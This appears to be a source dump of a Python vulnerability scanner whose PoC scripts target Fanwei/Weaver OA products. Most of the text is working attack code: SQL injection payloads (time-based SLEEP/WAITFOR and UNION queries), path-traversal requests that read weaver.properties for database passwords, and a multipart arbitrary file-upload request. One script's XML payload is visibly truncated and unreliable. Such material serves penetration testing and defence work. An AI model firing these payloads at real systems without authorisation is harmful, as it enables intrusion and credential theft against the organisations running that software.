1 | #!/usr/bin/env python
2 | # coding=utf-8
3 | from inc import init
4 | from inc import thread, common
5 | # 禁用https报错
6 | from urllib3.exceptions import InsecureRequestWarning
7 | from urllib3 import disable_warnings
8 |
9 | disable_warnings(InsecureRequestWarning)
10 |
11 |
def verify(target, script_list):
    """Queue every poc in ``script_list`` against ``target`` and run the pool.

    One task per (target, script) pair is pushed to a fresh ThreadPool,
    which is then started. Returns nothing.
    """
    pool = thread.ThreadPool()
    # Enqueue all work first so the pool sees the full list before starting.
    tasks = [(target, poc) for poc in script_list]
    for args in tasks:
        pool.add_task(*args)
    pool.start_threadpool()
17 |
18 |
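def attack(target, script):
    """Run the ``attack`` routine of the poc registered under ``script``.

    The poc object is looked up in the shared ``pocinfo_dict`` value kept by
    ``inc.common``. Returns True only when the poc's ``attack`` reports
    success; an unknown script name or any exception raised by the poc
    yields False.
    """
    try:
        poc = common.get_value("pocinfo_dict")[script]
        return bool(poc.attack(target))
    except Exception:
        # Exception, not a bare except: KeyboardInterrupt and SystemExit must
        # still stop the scan instead of being reported as a failed poc.
        return False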
26 |
--------------------------------------------------------------------------------
/poc_model.txt:
--------------------------------------------------------------------------------
import urllib
import urllib.parse

import requests
3 |
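def verify(url, *, timeout=13):
    """Template verify routine: probe ``url`` and report whether it matched.

    Args:
        url: base URL of the target.
        timeout: per-request timeout handed to requests; the default mirrors
            ``timeout`` in inc/config.py.

    Returns:
        A dict with ``name``, ``vulnerable`` and ``url``; ``verify`` (the
        probed URL) is added only when the check matched. Network failures
        never raise — the dict is returned with ``vulnerable`` False.
    """
    result = {
        'name': '',
        'vulnerable': False,
        'url': url
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
        'Connection': 'close'
    }
    vurl = urllib.parse.urljoin(url, "/weaver/")
    try:
        # The original called the module itself (`requests(vurl, ...)`), which
        # raises TypeError on every run and was masked by the bare except.
        # A timeout is mandatory: an unresponsive host would otherwise hold a
        # worker thread forever.
        response = requests.get(vurl, headers=headers, timeout=timeout)
        if response.status_code == 200 and 'DatabaseName' in response.text:
            result['vulnerable'] = True
            result['verify'] = vurl
        return result
    except requests.RequestException:
        # Timeouts and connection errors mean "not confirmed", nothing more.
        return result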
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/TestFile_weaver_common_ctrl_upload.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/TestFile_weaver_common_ctrl_upload.zip
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/__pycache__/fanwei_Bsh_rce.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/__pycache__/fanwei_Bsh_rce.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/__pycache__/fanwei_WorkflowCenterTreeData_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/__pycache__/fanwei_WorkflowCenterTreeData_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/__pycache__/fanwei_common_ctrl_upload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/__pycache__/fanwei_common_ctrl_upload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ebridge/__pycache__/fanwei_ebridge_addResume_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ebridge/__pycache__/fanwei_ebridge_addResume_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ebridge/__pycache__/fanwei_ebridge_addTaste_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ebridge/__pycache__/fanwei_ebridge_addTaste_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ebridge/fanwei_ebridge_addTaste_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
def verify(url):
    """Time-based check for the e-Bridge addTaste SQL injection.

    Sends one GET to the ``/taste/addTaste`` endpoint and judges solely by
    round-trip latency: the payload makes a vulnerable backend sleep for
    5 s, so a response slower than that is treated as confirmation.

    Returns a dict with ``name``, ``vulnerable`` and ``url``; ``verify``
    (the probed URL) is added only when the latency threshold is met.
    Any exception yields the dict unchanged.
    """
    relsult = {
        'name': '泛微云桥 e-Bridge addTaste接口SQL注入漏洞',
        'vulnerable': False,
        'url': url
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
        'Accept-Encoding': 'gzip, deflate',
        'Connection':'close'
    }
    vurl = urllib.parse.urljoin(url, "/taste/addTaste?company=1&userName=1&openid=1&source=1&mobile=1%27%20AND%20(SELECT%208094%20FROM%20(SELECT(SLEEP(5-(IF(18015%3e3469,0,4)))))mKjk)%20OR%20%27KQZm%27=%27REcX")
    try:
        # NOTE(review): no timeout= is passed, so an unresponsive host blocks
        # the worker thread indefinitely; inc/config.py defines timeout = 13
        # but it is not applied here.
        response = requests.get(vurl, headers=headers)
        # Any 400–498 status is "not vulnerable"; every other status with a
        # round trip above 5 s counts as confirmed. A slow or overloaded
        # target produces the same delay, so this check can false-positive.
        if response.status_code not in range(400, 499) and response.elapsed.total_seconds() > 5:
            relsult['vulnerable'] = True
            relsult['verify'] = vurl
        return relsult

    except:
        # NOTE(review): a bare except also swallows KeyboardInterrupt and
        # SystemExit; `except requests.RequestException:` is the narrow form.
        return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_cology_FileDownload_lfi.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_cology_FileDownload_lfi.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_CptDwrUtil_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_CptDwrUtil_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_Getdata_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_Getdata_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_HrmCareerApplyPerView_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_HrmCareerApplyPerView_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_HrmService_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_HrmService_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_KtreeUploadAction_fileupload.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_KtreeUploadAction_fileupload.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_LoginSSO_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_LoginSSO_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_ProcessOverRequestByXml_lfi.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_ProcessOverRequestByXml_lfi.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_ResourceServlet_lfi.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_ResourceServlet_lfi.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_SignatureDownLoad_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_SignatureDownLoad_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_SptmForPortalThumbnail_lfi.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_SptmForPortalThumbnail_lfi.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_WorkPlanService_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_WorkPlanService_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_WorkflowServiceXml_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_WorkflowServiceXml_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_XmlRpcServlet_lfi.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_XmlRpcServlet_lfi.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_browser_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_browser_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_getE9DevelopAllNameValue2_lfi.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_getE9DevelopAllNameValue2_lfi.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_getLabelByModule_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_getLabelByModule_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_getsqldata_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_getsqldata_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_jqueryFileTree_direct.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_jqueryFileTree_direct.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_setup_unauth.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_setup_unauth.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_uploadOperation_fileupload_2022.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_uploadOperation_fileupload_2022.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_v8_sqli.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_v8_sqli.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_verifyquicklogin_loginbypass_2022.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_verifyquicklogin_loginbypass_2022.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_workflowservicexml_rce.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a6903147/FingerVulnScanner/726c4b66f02a19ac6f7164d343dbedc74cc90358/pocs/web/OA/fanwei/ecology/__pycache__/fanwei_ecology_workflowservicexml_rce.cpython-311.pyc
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/fanwei_cology_FileDownload_lfi.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
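def verify(url):
    """Probe *url* for the E-Cology FileDownload arbitrary-file-read issue.

    Args:
        url: Base URL of the target host; the check path is joined onto it.

    Returns:
        dict with ``name``, ``vulnerable`` (bool) and ``url``.  On a match,
        ``vulnerable`` is True and ``verify`` holds the request URL used.
        Transport errors and timeouts yield the default, not-vulnerable result.
    """
    import urllib.parse  # a bare module-level `import urllib` does not bind urllib.parse
    result = {
        'name': '泛微OA-E-Cology-FileDownload文件读取漏洞',
        'vulnerable': False,
        'url': url
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
        'Accept-Encoding': 'gzip, deflate',
        'Connection': 'close',
        'Upgrade-Insecure-Requests': '1'
    }
    vurl = urllib.parse.urljoin(url, "/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/prop/weaver.properties")
    try:
        response = requests.get(vurl, headers=headers, timeout=5)
        # Content signal: 200 plus the literal 'password' in the body.  A generic page that
        # happens to contain the word would also match, so confirm before reporting.
        hit = response.status_code == 200 and 'password' in response.text
    except Exception:  # was a bare except, which also swallowed KeyboardInterrupt
        return result
    if hit:
        result['vulnerable'] = True
        result['verify'] = vurl
    return result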
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/fanwei_ecology_CptDwrUtil_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
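def verify(url):
    """Probe *url* for the E-cology 8 CptDwrUtil time-based SQL injection.

    Args:
        url: Base URL of the target host; the check path is joined onto it.

    Returns:
        dict with ``name``, ``vulnerable`` (bool) and ``url``.  When the
        timing signal fires, ``vulnerable`` is True and ``verify`` holds the
        request URL used.  Transport errors and timeouts yield the default,
        not-vulnerable result instead of raising.
    """
    import urllib.parse  # a bare module-level `import urllib` does not bind urllib.parse
    result = {
        'name': '泛微E-cology 8 CptDwrUtil 存在SQL注入漏洞',
        'vulnerable': False,
        'url': url
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36',
        'Connection': 'close',
        'Content-Type': 'text/plain',
        'Accept-Encoding': 'gzip'
    }
    data = '''callCount=1&page=httpSessionId=&scriptSessionId=&c0-scriptName=DocDwrUtil&c0-methodName=ifNewsCheckOutByCurrentUser&c0-id=0&batchId=0&c0-param1=string:1&c0-param0=string:1 WAITFOR DELAY '0:0:5' '''
    vurl = urllib.parse.urljoin(url, "/dwr/call/plaincall/CptDwrUtil.ifNewsCheckOutByCurrentUser.dwr")
    try:
        # 10 s timeout leaves headroom above the 5 s delay the payload requests
        response = requests.post(vurl, headers=headers, data=data, timeout=10)
        # Timing oracle: a reply slower than 5 s counts as a hit.  Any 4xx means the endpoint
        # was not reached as intended (the original range(400, 499) left 499 out).  A slow but
        # unaffected host can trip this too; treat a hit as "needs confirmation".
        hit = (not 400 <= response.status_code < 500
               and response.elapsed.total_seconds() > 5)
    except Exception:  # was a bare except, which also swallowed KeyboardInterrupt
        return result
    if hit:
        result['vulnerable'] = True
        result['verify'] = vurl
    return result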
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/fanwei_ecology_Getdata_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
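def verify(url):
    """Probe *url* for the E-Cology getdata.jsp time-based SQL injection.

    Args:
        url: Base URL of the target host; the check path is joined onto it.

    Returns:
        dict with ``name``, ``vulnerable`` (bool) and ``url``.  When the
        timing signal fires, ``vulnerable`` is True and ``verify`` holds the
        request URL used.  Transport errors and timeouts yield the default,
        not-vulnerable result instead of raising.
    """
    import urllib.parse  # a bare module-level `import urllib` does not bind urllib.parse
    result = {
        'name': '泛微OA-E-Cology-Getdata.jsp存在SQL注入漏洞',
        'vulnerable': False,
        'url': url
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Accept-Encoding': 'gzip, deflate',
        'Connection': 'close',
        'Cookie': 'ecology_JSessionId=abcdTYJZpKflG5NUo9X0y; testBanCookie=test',
        'Upgrade-Insecure-Requests': '1'
    }
    vurl = urllib.parse.urljoin(url, "/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=WAITFOR+DELAY+%270%3A0%3A5%27")
    try:
        # timeout added: the original had none, so an unresponsive host pinned the scanner
        # thread forever; 10 s leaves headroom above the 5 s delay the payload requests.
        response = requests.get(vurl, headers=headers, timeout=10)
        # Timing oracle: a reply slower than 5 s counts as a hit.  Any 4xx means the endpoint
        # was not reached as intended (the original range(400, 499) left 499 out).  A slow but
        # unaffected host can trip this too; treat a hit as "needs confirmation".
        hit = (not 400 <= response.status_code < 500
               and response.elapsed.total_seconds() > 5)
    except Exception:  # was a bare except, which also swallowed KeyboardInterrupt
        return result
    if hit:
        result['vulnerable'] = True
        result['verify'] = vurl
    return result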
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/fanwei_ecology_HrmCareerApplyPerView_sqli.py:
--------------------------------------------------------------------------------
1 | import urllib
2 |
3 | import requests
4 |
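def verify(url):
    """Probe *url* for the E-cology 8 HrmCareerApplyPerView SQL injection.

    Args:
        url: Base URL of the target host; the check path is joined onto it.

    Returns:
        dict with ``name``, ``vulnerable`` (bool) and ``url``.  On a match,
        ``vulnerable`` is True and ``verify`` holds the request URL used.
        Transport errors and timeouts yield the default, not-vulnerable result.
    """
    import urllib.parse  # a bare module-level `import urllib` does not bind urllib.parse
    result = {
        'name': '泛微E-ecology 8 HrmCareerApplyPerView 存在SQL注入漏洞',
        'vulnerable': False,
        'url': url
    }
    timeout = 3
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
        'Accept-Encoding': 'gzip, deflate',
        'Connection': 'close'
    }
    vurl = urllib.parse.urljoin(url, "/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1+union+select+1,2,sys.fn_sqlvarbasetostr(HashBytes('MD5','abc')),db_name(1),5,6,7")
    try:
        response = requests.get(vurl, headers=headers, timeout=timeout)
        # Content signal: the hex form of the MD5 of the constant 'abc' computed by the database
        # must appear in the body; a response that merely echoes the query would not contain it.
        hit = (response.status_code == 200
               and '0x900150983cd24fb0d6963f7d28e17f72' in response.text)
    except Exception:  # was a bare except, which also swallowed KeyboardInterrupt
        return result
    if hit:
        result['vulnerable'] = True
        result['verify'] = vurl
    return result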
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/fanwei_ecology_KtreeUploadAction_fileupload.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
def verify(url: str) -> dict[str, str | bool]:
    """Probe *url* for the E-Cology KtreeUploadAction file-upload issue.

    Args:
        url: Base URL of the target host; the check path is joined onto it.

    Returns:
        dict with ``name``, ``vulnerable`` (bool) and ``url``.  ``vulnerable``
        becomes True when the endpoint answers 200 and echoes ``.txt`` back.
        Any exception (including timeouts) yields the default result.
    """
    relsult = {
        'name': '泛微E-Cology-KtreeUploadAction任意文件上传漏洞',
        'vulnerable': False,
        'url': url
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Encoding': 'gzip, deflate, br',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Cache-Control': 'max-age=0',
        'Connection': 'close',
        # the hand-built body below uses "--" + this boundary on each delimiter line
        'Content-Type': 'multipart/form-data; boundary=--------1638451160',
        'Cookie': 'Secure; JSESSIONID=abc6xLBV7S2jvgm3CB50w; Secure; testBanCookie=test',
        'Upgrade-Insecure-Requests': '1'
    }
    # Hand-built multipart body.  NOTE(review): leading whitespace inside this literal is not
    # recoverable from this rendering; multipart delimiters must start at column 0 — confirm
    # against the repository copy.
    data = '''
----------1638451160
Content-Disposition: form-data; name="test"; filename="test.txt"
Content-Type: application/octet-stream

test
----------1638451160--'''
    vurl = urllib.parse.urljoin(url, "/weaver/com.weaver.formmodel.apps.ktree.servlet.KtreeUploadAction?action=image")
    try:
        # NOTE(review): no timeout= here, unlike the sibling checks; an unresponsive host
        # blocks the calling thread indefinitely.
        response = requests.post(vurl, headers=headers, data=data)
        # Content signal: 200 plus '.txt' somewhere in the body.  Any page mentioning a .txt
        # name would also match, so confirm before reporting.
        if response.status_code == 200 and '.txt' in response.text:
            relsult['vulnerable'] = True
            # unlike the sibling checks, the request URL is not recorded under 'verify'
        return relsult

    except:  # bare except: also swallows KeyboardInterrupt; kept as in the original
        return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/fanwei_ecology_LoginSSO_sqli.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
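def verify(url):
    """Probe *url* for the E-cology LoginSSO.jsp SQL injection (CNVD-2021-33202).

    Args:
        url: Base URL of the target host; the check path is joined onto it.

    Returns:
        dict with ``name``, ``vulnerable`` (bool) and ``url``.  On a match,
        ``vulnerable`` is True and ``verify`` holds the request URL used.
        Transport errors and timeouts yield the default, not-vulnerable result.
    """
    import urllib.parse  # a bare module-level `import urllib` does not bind urllib.parse
    result = {
        'name': '泛微E-cology-LoginSSO.jsp存在SQL注入漏洞(CNVD-2021-33202)',
        'vulnerable': False,
        'url': url
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
        'Accept-Encoding': 'gzip, deflate',
        'Connection': 'close'
    }
    vurl = urllib.parse.urljoin(url, "/upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20@@version%20as%20id%20from%20HrmResourceManager")
    try:
        response = requests.get(vurl, headers=headers, timeout=5)
        # Content signal: 200 plus the literal 'Microsoft' in the body (the version banner the
        # query is expected to surface).  Unrelated pages mentioning Microsoft also match, so
        # confirm before reporting.
        hit = response.status_code == 200 and 'Microsoft' in response.text
    except Exception:  # was a bare except, which also swallowed KeyboardInterrupt
        return result
    if hit:
        result['vulnerable'] = True
        result['verify'] = vurl
    return result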
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/fanwei_ecology_ProcessOverRequestByXml_lfi.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
def verify(url: str) -> dict[str, str | bool]:
    """Probe *url* for the e-cology ProcessOverRequestByXml file-read issue.

    Args:
        url: Base URL of the target host; the check path is joined onto it.

    Returns:
        dict with ``name``, ``vulnerable`` (bool) and ``url``.  On a match,
        ``vulnerable`` is True and ``verify`` holds the request URL used.
        Any exception (including timeouts) yields the default result.
    """
    relsult = {
        'name': '泛微e-cology-ProcessOverRequestByXml接口存在任意文件读取漏洞',
        'vulnerable': False,
        'url': url
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36',
        'Accept-Encoding': 'gzip, deflate',
        'Accept': '*/*',
        'Connection': 'close',
        'Content-Type': 'application/xml',
        # hard-coded length; requests normally recomputes Content-Length from the actual body
        'Content-Length': '146'
    }
    # NOTE(review): the request body appears truncated in this rendering — the XML markup
    # seems to have been stripped, leaving only a trailing fragment.  Confirm against the
    # repository copy before relying on this check.
    data = ''']>&test;'''
    vurl = urllib.parse.urljoin(url, "/rest/ofs/ProcessOverRequestByXml")
    try:
        # NOTE(review): no timeout= on this request; an unresponsive host blocks the caller.
        response = requests.post(vurl, headers=headers, data=data)
        # Content signal: 200 plus the literal '[files]' echoed in the body
        if response.status_code == 200 and '[files]' in response.text:
            relsult['vulnerable'] = True
            relsult['verify'] = vurl
        return relsult

    except:  # bare except: also swallows KeyboardInterrupt; kept as in the original
        return relsult
--------------------------------------------------------------------------------
/pocs/web/OA/fanwei/ecology/fanwei_ecology_ResourceServlet_lfi.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import urllib
3 |
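def verify(url):
    """Probe *url* for the ResourceServlet arbitrary-file-read issue.

    Args:
        url: Base URL of the target host; the check path is joined onto it.

    Returns:
        dict with ``name``, ``vulnerable`` (bool) and ``url``.  On a match,
        ``vulnerable`` is True and ``verify`` holds the request URL used.
        Transport errors and timeouts yield the default, not-vulnerable result.
    """
    import urllib.parse  # a bare module-level `import urllib` does not bind urllib.parse
    result = {
        'name': '泛微-OA系统ResourceServlet接口任意文件读取漏洞',
        'vulnerable': False,
        'url': url
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)',
        'Accept-Encoding': 'gzip, deflate',
        'Connection': 'close'
    }
    vurl = urllib.parse.urljoin(url, "/weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/prop/weaver.properties")
    try:
        response = requests.get(vurl, headers=headers, timeout=3)
        # Content signal: 200 plus the property key 'DatabaseName' in the body
        hit = response.status_code == 200 and 'DatabaseName' in response.text
    except Exception:  # was a bare except, which also swallowed KeyboardInterrupt
        return result
    if hit:
        result['vulnerable'] = True
        result['verify'] = vurl
    return result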
--------------------------------------------------------------------------------
